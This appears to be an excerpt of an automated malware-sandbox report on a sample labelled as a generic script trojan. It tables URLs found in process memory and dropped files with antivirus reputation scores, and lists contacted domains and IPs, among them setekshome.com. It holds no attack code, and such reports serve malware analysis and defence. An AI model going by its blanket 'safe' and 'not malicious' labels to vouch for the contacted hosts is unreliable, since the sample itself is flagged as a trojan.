https://excel.office.com | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://word.office.com | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | 0% | URL Reputation | safe
http://nsis.sf.net/NSIS_ErrorError | 0% | URL Reputation | safe
https://outlook.com | 0% | URL Reputation | safe
https://android.notify.windows.com/iOS | 0% | URL Reputation | safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp | 0% | URL Reputation | safe
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the | 0% | URL Reputation | safe
https://api.msn.com/v1/news/Feed/Windows? | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
http://schemas.micro | 0% | URL Reputation | safe
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://oneget.orgX | 0% | URL Reputation | safe
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://www.apache.org/licenses/LICENSE-2.0 | 0% | URL Reputation | safe
https://dns10.quad9.net/dns-query | 0% | Avira URL Cloud | safe
https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world | 0% | Avira URL Cloud | safe
https://www.google.com/chrome/privacy/eula_text.html | 0% | Avira URL Cloud | safe
https://doh.familyshield.opendns.com/dns-query | 0% | Avira URL Cloud | safe
https://api.msn.com:443/v1/news/Feed/Windows?t | 0% | Avira URL Cloud | safe
https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter | 0% | Avira URL Cloud | safe
https://doh.cleanbrowsing.org/doh/security-filter | 0% | Avira URL Cloud | safe
https://dns10.quad9.net/dns-query | 1% | Virustotal | -
https://doh.familyshield.opendns.com/dns-query | 0% | Virustotal | -
https://public.dns.iij.jp/ | 0% | Avira URL Cloud | safe
https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar- | 0% | Avira URL Cloud | safe
https://public.dns.iij.jp/ | 0% | Virustotal | -
https://photos.google.com/settings?referrer=CHROME_NTP | 0% | Avira URL Cloud | safe
https://www.google.com/chrome/privacy/eula_text.html | 1% | Virustotal | -
https://doh.cox.net/dns-query | 0% | Avira URL Cloud | safe
https://dns11.quad9.net/dns-querydns11.quad9.net9.9.9.11149.112.112.112620:fe::112620:fe::fe:11Pd | 0% | Avira URL Cloud | safe
https://doh.cleanbrowsing.org/doh/security-filter | 0% | Virustotal | -
https://photos.google.com/settings?referrer=CHROME_NTP | 0% | Virustotal | -
https://www.nic.cz/odvr/ | 0% | Avira URL Cloud | safe
https://dns11.quad9.net/dns-query | 0% | Avira URL Cloud | safe
https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/ | 0% | Avira URL Cloud | safe
https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl | 0% | Avira URL Cloud | safe
https://www.nic.cz/odvr/CZ.NIC | 0% | Avira URL Cloud | safe
https://www.nic.cz/odvr/ | 0% | Virustotal | -
https://dns11.quad9.net/dns-query | 1% | Virustotal | -
https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc | 0% | Avira URL Cloud | safe
https://doh.cox.net/dns-query | 0% | Virustotal | -
https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/ | 0% | Virustotal | -
https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl | 0% | Virustotal | -
https://wns.windows.com/ | 0% | Avira URL Cloud | safe
https://www.google.com/chrome/privacy/eula_text.htmlG | 0% | Avira URL Cloud | safe
https://public.dns.iij.jp/IIJ | 0% | Avira URL Cloud | safe
http://www.autoitscript.com/autoit3/J | 0% | Avira URL Cloud | safe
https://cleanbrowsing.org/privacyCleanBrowsing | 0% | Avira URL Cloud | safe
https://public.dns.iij.jp/IIJ | 0% | Virustotal | -
https://www.nic.cz/odvr/CZ.NIC | 0% | Virustotal | -
https://nextdns.io/privacy | 0% | Avira URL Cloud | safe
https://support.google.com/chromebook?p=app_intent | 0% | Avira URL Cloud | safe
http://www.autoitscript.com/autoit3/J | 0% | Virustotal | -
https://alekberg.net/privacyalekberg.net | 0% | Avira URL Cloud | safe
https://developers.google.com/speed/public-dns/privacyGoogle | 0% | Avira URL Cloud | safe
https://cleanbrowsing.org/privacyCleanBrowsing | 0% | Virustotal | -
https://wns.windows.com/ | 0% | Virustotal | -
https://dns11.quad9.net/dns-querydns11.quad9.net9.9.9.11149.112.112.112620:fe::112620:fe::fe:11Pd | 4% | Virustotal | -
https://support.google.com/chromebook?p=app_intent | 0% | Virustotal | -
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark | 0% | Avira URL Cloud | safe
https://www.google.com/chrome/privacy/eula_text.htmlG | 1% | Virustotal | -
https://alekberg.net/privacyalekberg.net | 0% | Virustotal | -
https://chrome.cloudflare-dns.com/dns-queryone.one.one.one1dot1dot1dot1.cloudflare-dns.com1.1.1.11.0 | 0% | Avira URL Cloud | safe
https://dns64.dns.google/dns-query | 0% | Avira URL Cloud | safe
https://nextdns.io/privacy | 0% | Virustotal | -
https://doh.opendns.com/dns-query | 0% | Avira URL Cloud | safe
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
https://dns.quad9.net/dns-query | 0% | Avira URL Cloud | safe
https://developers.google.com/speed/public-dns/privacyGoogle | 0% | Virustotal | -
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark | 0% | Virustotal | -
https://doh.opendns.com/dns-query | 0% | Virustotal | -
https://dns64.dns.google/dns-query | 0% | Virustotal | -
https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl | 0% | Avira URL Cloud | safe
https://dns.sb/privacy/DNS.SBhttps://doh.dns.sb/dns-query | 0% | Avira URL Cloud | safe
https://chrome.cloudflare-dns.com/dns-queryone.one.one.one1dot1dot1dot1.cloudflare-dns.com1.1.1.11.0 | 0% | Virustotal | -
https://chrome-devtools-frontend.appspot.com/%s%s/%s/NetworkResourceLoaderstreamWriteInspectableWebC | 0% | Avira URL Cloud | safe
https://public.dns.iij.jp/dns-query | 0% | Avira URL Cloud | safe
https://chrome.google.com/webstore?hl=frRaccourci | 0% | Avira URL Cloud | safe
https://support.google.com/chrome/a/?p=block_warn | 0% | Avira URL Cloud | safe
https://chrome.google.com/webstore?hl=zh-CN | 0% | Avira URL Cloud | safe
https://alekberg.net/privacy | 0% | Avira URL Cloud | safe
https://dnsnl.alekberg.net/dns-query | 0% | Avira URL Cloud | safe
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua | 0% | Avira URL Cloud | safe
https://chrome.google.com/webstore?hl=zh-CN&category=theme81https://myactivity.google.com/myactivity | 0% | Avira URL Cloud | safe
https://doh.cox.net/dns-querydot.cox.net68.105.28.1168.105.28.122001:578:3f::30 | 0% | Avira URL Cloud | safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT | 0% | Avira URL Cloud | safe
https://www.pollensense.com/ | 0% | Avira URL Cloud | safe
https://chromium.dns.nextdns.io | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Reputation
chrome.cloudflare-dns.com | 162.159.61.3 | true | false | unknown
clientstats1-dummy-server-lb-398743415.us-east-1.elb.amazonaws.com | 3.222.214.216 | true | false | unknown
ingress-sticky-haproxy-eu-da5b7868dc470a9a.elb.eu-west-1.amazonaws.com | 52.48.38.99 | true | false | unknown
socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com | 52.30.21.185 | true | false | unknown
setekshome.com | 185.111.234.27 | true | false | unknown
sockjs-eu.pusher.com | unknown | unknown | false | unknown
ws-eu.pusher.com | unknown | unknown | false | unknown
www.setekshome.com | unknown | unknown | false | unknown
stats.pusher.com | unknown | unknown | false | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://api.msn.com:443/v1/news/Feed/Windows?t | explorer.exe, 0000001D.00000000.1774067541.0000000007276000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://support.google.com/chrome/answer/6098869 | zh-CN.pak.0.dr, fr.pak.0.dr | false | URL Reputation: safe | unknown
https://dns10.quad9.net/dns-query | defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Virustotal: 1%; Avira URL Cloud: safe | unknown
https://www.google.com/chrome/privacy/eula_text.html | zh-CN.pak.0.dr | false | Virustotal: 1%; Avira URL Cloud: safe | unknown
https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world | explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.msn.com:443/v1/news/Feed/Windows? | explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://doh.familyshield.opendns.com/dns-query | defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter | explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://doh.cleanbrowsing.org/doh/security-filter | defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://public.dns.iij.jp/ | defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://excel.office.com | explorer.exe, 0000001D.00000000.1779503148.000000000C091000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar- | explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://photos.google.com/settings?referrer=CHROME_NTP | zh-CN.pak.0.dr, fr.pak.0.dr | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://doh.cox.net/dns-query | defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://dns11.quad9.net/dns-querydns11.quad9.net9.9.9.11149.112.112.112620:fe::112620:fe::fe:11Pd | defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Virustotal: 4%; Avira URL Cloud: safe | unknown
https://www.nic.cz/odvr/ | defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://dns11.quad9.net/dns-query | defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Virustotal: 1%; Avira URL Cloud: safe | unknown
https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/ | defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl | zh-CN.pak.0.dr, fr.pak.0.dr | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000017.00000002.1646408112.0000023AB1531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1646408112.0000023AB13EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1612107420.0000023AA2CC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1743397396.0000019ADD86E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1743397396.0000019ADD9B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACF142000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.nic.cz/odvr/CZ.NIC | defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc | explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://wns.windows.com/ | explorer.exe, 0000001D.00000000.1776329895.00000000090F2000.00000004.00000001.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://www.google.com/chrome/privacy/eula_text.htmlG | fr.pak.0.dr | false | Virustotal: 1%; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000017.00000002.1612107420.0000023AA1381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACD801000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://public.dns.iij.jp/IIJ | defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
http://www.autoitscript.com/autoit3/J | explorer.exe, 0000001D.00000000.1779503148.000000000C400000.00000004.00000001.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://cleanbrowsing.org/privacyCleanBrowsing | defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://nextdns.io/privacy | defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://word.office.com | explorer.exe, 0000001D.00000000.1779503148.000000000C091000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://support.google.com/chromebook?p=app_intent | zh-CN.pak.0.dr, fr.pak.0.dr | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000001A.00000002.1675946104.0000019ACF0BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACEF0A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000001A.00000002.1675946104.0000019ACF0BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACEF0A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://alekberg.net/privacyalekberg.net | defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://go.micro | powershell.exe, 00000017.00000002.1612107420.0000023AA253C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACE537000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000001A.00000002.1675946104.0000019ACF142000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://developers.google.com/speed/public-dns/privacyGoogle | defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark | explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://chrome.cloudflare-dns.com/dns-queryone.one.one.one1dot1dot1dot1.cloudflare-dns.com1.1.1.11.0 | defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://dns64.dns.google/dns-query | defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://doh.opendns.com/dns-query | defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://nsis.sf.net/NSIS_ErrorError | SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | false | URL Reputation: safe | unknown
https://dns.quad9.net/dns-query | defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Avira URL Cloud: safe | unknown
https://outlook.com | explorer.exe, 0000001D.00000000.1779503148.000000000C091000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 0000001A.00000002.1675946104.0000019ACF0BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACEF0A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl | zh-CN.pak.0.dr, fr.pak.0.dr | false | Avira URL Cloud: safe | unknown
https://dns.sb/privacy/DNS.SBhttps://doh.dns.sb/dns-query | defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Avira URL Cloud: safe | unknown
https://android.notify.windows.com/iOS | explorer.exe, 0000001D.00000000.1776329895.000000000913F000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://chrome-devtools-frontend.appspot.com/%s%s/%s/NetworkResourceLoaderstreamWriteInspectableWebC | defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Avira URL Cloud: safe | unknown
https://public.dns.iij.jp/dns-query | defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Avira URL Cloud: safe | unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp | explorer.exe, 0000001D.00000000.1776329895.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the | explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://chrome.google.com/webstore?hl=frRaccourci | fr.pak.0.dr | false | Avira URL Cloud: safe | unknown
https://support.google.com/chrome/a/?p=block_warn | fr.pak.0.dr | false | Avira URL Cloud: safe | unknown
https://chrome.google.com/webstore?hl=zh-CN | zh-CN.pak.0.dr | false | Avira URL Cloud: safe | unknown
https://alekberg.net/privacy | defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Avira URL Cloud: safe | unknown
https://dnsnl.alekberg.net/dns-query | defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Avira URL Cloud: safe | unknown
https://chrome.google.com/webstore?hl=zh-CN&category=theme81https://myactivity.google.com/myactivity | zh-CN.pak.0.dr | false | Avira URL Cloud: safe | unknown
https://api.msn.com/v1/news/Feed/Windows? | explorer.exe, 0000001D.00000000.1776329895.0000000008F09000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua | explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://doh.cox.net/dns-querydot.cox.net68.105.28.1168.105.28.122001:578:3f::30 | defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT | explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.pollensense.com/ | explorer.exe, 0000001D.00000000.1774067541.00000000071A4000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://chromium.dns.nextdns.io | defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 0000001A.00000002.1675946104.0000019ACF142000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://dns.google/dns-query | defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Avira URL Cloud: safe | unknown
https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi | explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b | explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.micro | explorer.exe, 0000001D.00000000.1779503148.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1775864991.0000000008820000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.1775178622.0000000007C70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.1775842222.0000000008810000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
https://passwords.google.comCompte | fr.pak.0.dr | false | Avira URL Cloud: safe | unknown
https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt | explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://int3.de/ | elevate.exe.0.dr | false | Avira URL Cloud: safe | unknown
https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/Cloudflare | defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Avira URL Cloud: safe | unknown
https://myactivity.google.com/ | zh-CN.pak.0.dr, fr.pak.0.dr | false | Avira URL Cloud: safe | unknown
https://perfetto.dev/docs/contributing/getting-started#community).No | defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Avira URL Cloud: safe | unknown
https://doh.quickline.ch/dns-query | defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Avira URL Cloud: safe | unknown
https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch- | explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://chrome-devtools-frontend.appspot.com/ | defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Avira URL Cloud: safe | unknown
https://chrome.google.com/webstore?hl=fr&category=theme81https://myactivity.google.com/myactivity/?u | fr.pak.0.dr | false | Avira URL Cloud: safe | unknown
https://developers.google.com/speed/public-dns/privacy | defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Avira URL Cloud: safe | unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew | explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 0000001A.00000002.1675946104.0000019ACF142000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://chromeenterprise.google/policies/#BrowserSwitcherUrlList | zh-CN.pak.0.dr, fr.pak.0.dr | false | Avira URL Cloud: safe | unknown
https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it | explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://oneget.orgX | powershell.exe, 00000017.00000002.1612107420.0000023AA253C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACEF0A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://policies.google.com/ | zh-CN.pak.0.dr, fr.pak.0.dr | false | Avira URL Cloud: safe | unknown
https://doh-02.spectrum.com/dns-query | defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Avira URL Cloud: safe | unknown
https://public.dns.iij.jp/dns-queryIijUShttps://nextdns.io/privacyNextDNShttps://chromium.dns.nextdn | defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Avira URL Cloud: safe | unknown
